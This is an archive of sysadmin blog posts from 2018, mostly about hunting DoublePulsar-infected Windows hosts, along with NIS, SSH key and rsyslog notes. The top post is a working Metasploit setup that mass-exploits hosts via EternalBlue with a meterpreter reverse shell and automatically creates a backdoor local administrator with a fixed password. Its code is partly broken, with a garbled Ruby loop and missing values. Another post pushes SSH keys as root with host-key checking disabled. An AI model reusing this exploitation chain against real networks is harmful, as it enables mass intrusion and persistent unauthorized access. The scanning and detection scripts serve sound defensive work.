Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
## msfconsole

```
msf > vulns -R
… a lot of text … look at end of output for a file dropped in /tmp e.g. ...
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k
msf > exit
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
```

Once all has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser, as those hosts have had the local admin user for your evil created.
## files

doublepulsar-loop.rc (the rhosts from vuln_db, looped over with the chained post exploit):

```ruby
# the rhosts from vuln_db
hosts=[],"r") do |f|
f.each_line do |line|
hosts.push line.strip
# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")
# the rhosts loop
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
run_single("sleep 2s")
```

/root/.msf4/doublepulsar.rc:

```
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
```

/root/.msf4/doublepulsar-lsadmin:

```
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
```

Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah.
```sh
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")
read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
    read -p "Enter email address (or not): " EMAIL
else
    echo "Not a valid IP" && exit 0
fi
rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
# split the spool on "] ", drop status/error noise, strip the port, keep only host result lines
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' | sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
# only mail when an address was given ("or not")
if [ -s /tmp/$IP/output.msf.INFECTED ]; then
    echo " Uh oh $IP DoublePulsar infected"
    [ -n "$EMAIL" ] && mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
    [ -n "$EMAIL" ] && mail -s " $IP DoublePulsar infected $EXECUTE " $EMAIL < /tmp/$IP/output.msf.1
else
    echo " Phew $IP not infected "
fi
if [ -s /tmp/$IP/output.msf.VULN ]; then
    echo " Sigh $IP DoublePulsar vulnerable "
    [ -n "$EMAIL" ] && mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
    echo " Double Phew $IP not DoublePulsar vulnerable"
fi
cd /tmp
rm -rf /tmp/$IP
exit 0
```

Friday, July 20, 2018

cron job for doublepulsar detection, burning, metasploit scan, and email of results

double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.

here's what i came up with:
```sh
$ dpkg-reconfigure exim4-config
$ apt-get install msf
$ searchsploit -u
$ apt-get install masscan
$ git clone
$ mkdir -p /root/scripts
$ mkdir -p /root/to.process
$ echo "." > /root/to.process/empty
```

-- script doublepulsar.cron in /root/scripts --

```sh
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")
NETWORKRANGE="<placeholder: the range to sweep, in CIDR>"
PROCESS=/root/to.process

# 1. find everything answering on 445 and reduce masscan's lines to bare addresses
masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan
sed -i "s/^.* on //" $PROCESS/output.masscan

# 2. doublepulsar detection script, with --uninstall to burn the implant where it is found
#    (the script filename inside the cloned repo is not given above)
/root/doublepulsar-detection-script/ --file \
$PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > $PROCESS/output.detect
sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED

# 3. metasploit scanner pass over the same hosts
msfconsole -x "color false ; spool $PROCESS/output.msf ; \
use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set THREADS 100; run; exit"
sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > $PROCESS/output.msf.1
sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN
sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED

# 4. mail a result either way, so a run that found nothing is distinguishable from a run that never happened
if [ -s $PROCESS/output.detect.INFECTED ]; then
        mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED
else
        mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi

if [ -s $PROCESS/output.msf.INFECTED ]; then
        cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN > $PROCESS/output.msf.INFECTEDVULN
        mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN
else
        mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi
```

-- end script --
run it every night, every hour, whenever. put it in /etc/crontab:

```
# evil
30 12   * * *   root    /root/scripts/doublepulsar.cron
```

the joy of the script is that, with all the text processing, it can be piped to syslog. so yeah, old news for you...
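As an added example (not the blog's own script), here is a less brittle way to pull the VULNERABLE and INFECTED hosts out of the smb_ms17_010 spool that both the one-off script and the cron script above post-process with the sed chain: it matches the module's own result phrases on [+] lines only. The spool content is constructed for the example, modelled on the module's message format.

```sh
#!/bin/sh
# Added example, not the blog's script: classify smb_ms17_010 spool output
# into VULNERABLE and INFECTED host lists by matching the module's result
# phrases instead of splitting on "] " and deleting noise with sed.
# The spool below is constructed, modelled on the module's message format.
SAMPLE_SPOOL='[*] 10.0.0.5:445          - Scanned 1 of 4 hosts (25% complete)
[+] 10.0.0.5:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.0.0.6:445          - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x58581D8A
[-] 10.0.0.7:445          - Host does NOT appear vulnerable.
[-] 10.0.0.8:445          - Connection refused
[+] 10.0.0.5:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)'

# hosts_matching STATE: read a spool on stdin and print the unique host IPs
# whose result line says "Host is likely STATE" (VULNERABLE or INFECTED).
# Only [+] lines carry results; [*] progress and [-] error lines are
# ignored, and the :445 suffix is stripped from the address.
hosts_matching() {
    awk -v state="$1" '
        $1 == "[+]" && index($0, "Host is likely " state) {
            sub(/:[0-9]+$/, "", $2)
            print $2
        }' | sort -u
}

vulnerable_hosts() { printf '%s\n' "$SAMPLE_SPOOL" | hosts_matching VULNERABLE; }
infected_hosts()   { printf '%s\n' "$SAMPLE_SPOOL" | hosts_matching INFECTED; }

# An infected host is already compromised, so it is listed before the
# merely unpatched ones. Returns non-zero when nothing was found, which
# is what a cron wrapper wants to branch on.
report() {
    inf=$(infected_hosts); vul=$(vulnerable_hosts)
    [ -n "$inf" ] && printf 'INFECTED (DoublePulsar present):\n%s\n' "$inf"
    [ -n "$vul" ] && printf 'VULNERABLE (MS17-010 unpatched):\n%s\n' "$vul"
    [ -n "$inf$vul" ]
}
```

Point hosts_matching at a real spool with `hosts_matching INFECTED < $PROCESS/output.msf` and the rest of the cron script stays as it is.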

Thursday, March 22, 2018

nis master server settings on cloned system

i need to change nis master server settings on a cloned system. don't even ask.

```
# domainname <newdomainname>
# mv /var/yp/<domainname> /var/yp/<newdomainname>
/etc/hosts change <hostname> to <newhostname> ; <ip> to <newip>
/etc/conf.d/net change <domainname> to <newdomainname>
/etc/yp.conf change <domainname> to <newdomainname>
/var/yp/ypservers change <hostname> to <newhostname>
# make -C /var/yp
# ypwhich
```

Should return <newhostname>

```
# ypcat passwd | grep <username>
# ypcat group | grep <groupname>
```

Both should return known results.

Wednesday, March 7, 2018

put pubkeys on a lot of hosts

i need to zap authorized_keys *all over the place*.
this concatenates a file which contains several keys onto each host's authorized_keys.
nodes is a long list of ip addresses.

```sh
for i in `cat nodes` ; do
    cat authorized_keys.add | ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o \
    UserKnownHostsFile=/dev/null -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys'
done
```
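An added example, not the blog's own code: the plain cat >> above appends duplicates every time the loop is rerun, so here is an idempotent merge keyed on key type plus base64 blob (it also copes with option prefixes such as from="..."). The key files and their contents are constructed for the demonstration; the host-key options in the loop above are a separate matter this example does not touch.

```sh
#!/bin/sh
# Added example, not the blog's loop: merge the keys in ADD_FILE into
# AUTH_FILE idempotently, so re-running the push (or a key that already
# landed with a different comment) does not append duplicates.
# Entries are identified by "type blob", skipping any option prefix.
merge_authorized_keys() {
    add_file=$1
    auth_file=$2
    tmp=$(mktemp) || return 1
    touch "$auth_file"
    awk '
        # keyid(): return "type blob" for a line, or "" for blanks/comments
        function keyid(    i) {
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) return $i " " $(i + 1)
            return ""
        }
        FILENAME == ARGV[1] { k = keyid(); if (k != "") seen[k] = 1; next }
        { k = keyid(); if (k != "" && !(k in seen)) { seen[k] = 1; print } }
    ' "$auth_file" "$add_file" > "$tmp"
    cat "$tmp" >> "$auth_file"
    rm -f "$tmp"
}

# Constructed demonstration: one key already present, an add-file that
# repeats it under another comment plus one new restricted key. Prints the
# entry count after two merges; a correct merge leaves exactly two.
demo_merge_twice() {
    dir=$(mktemp -d) || return 1
    printf 'ssh-ed25519 AAAAC3constructedKeyOne one@example\n' > "$dir/authorized_keys"
    printf '%s\n' \
        'ssh-ed25519 AAAAC3constructedKeyOne one-again@example' \
        'from="10.0.0.0/8" ssh-ed25519 AAAAC3constructedKeyTwo two@example' \
        > "$dir/authorized_keys.add"
    merge_authorized_keys "$dir/authorized_keys.add" "$dir/authorized_keys"
    merge_authorized_keys "$dir/authorized_keys.add" "$dir/authorized_keys"
    n=$(grep -c . "$dir/authorized_keys")
    rm -rf "$dir"
    echo "$n"
}
```

On the remote side the same function replaces the quoted 'cat >> /root/.ssh/authorized_keys', with the add-file streamed over stdin into a temporary file first.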

Thursday, February 8, 2018

when crond is using /bin/sh

crond uses sh by default. that last cron script i posted, well, the >( ... ) process substitution that tee writes into is a bashism, so it breaks in sh. do this:

```
0 12 * * * root 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'
```

Monday, February 5, 2018

debug rsyslogd

why isn't rsyslogd sending anything out?

```
window 1 $ tcpdump -u dst port 514
window 2 $ logger -n -P 514 "hello god"
<no answer>
```

hmm. let's debug rsyslogd

```
$ export RSYSLOG_DEBUGLOG="/tmp/debuglog"
$ export RSYSLOG_DEBUG="Debug"
$ service rsyslog stop
$ rsyslogd -d | head -10
7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root
7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)
7160.005895004:7fae096a3780: Requested to load module 'lmnet'
7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/'
7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).
7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module
7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module
7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module
7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module
```

bad modules.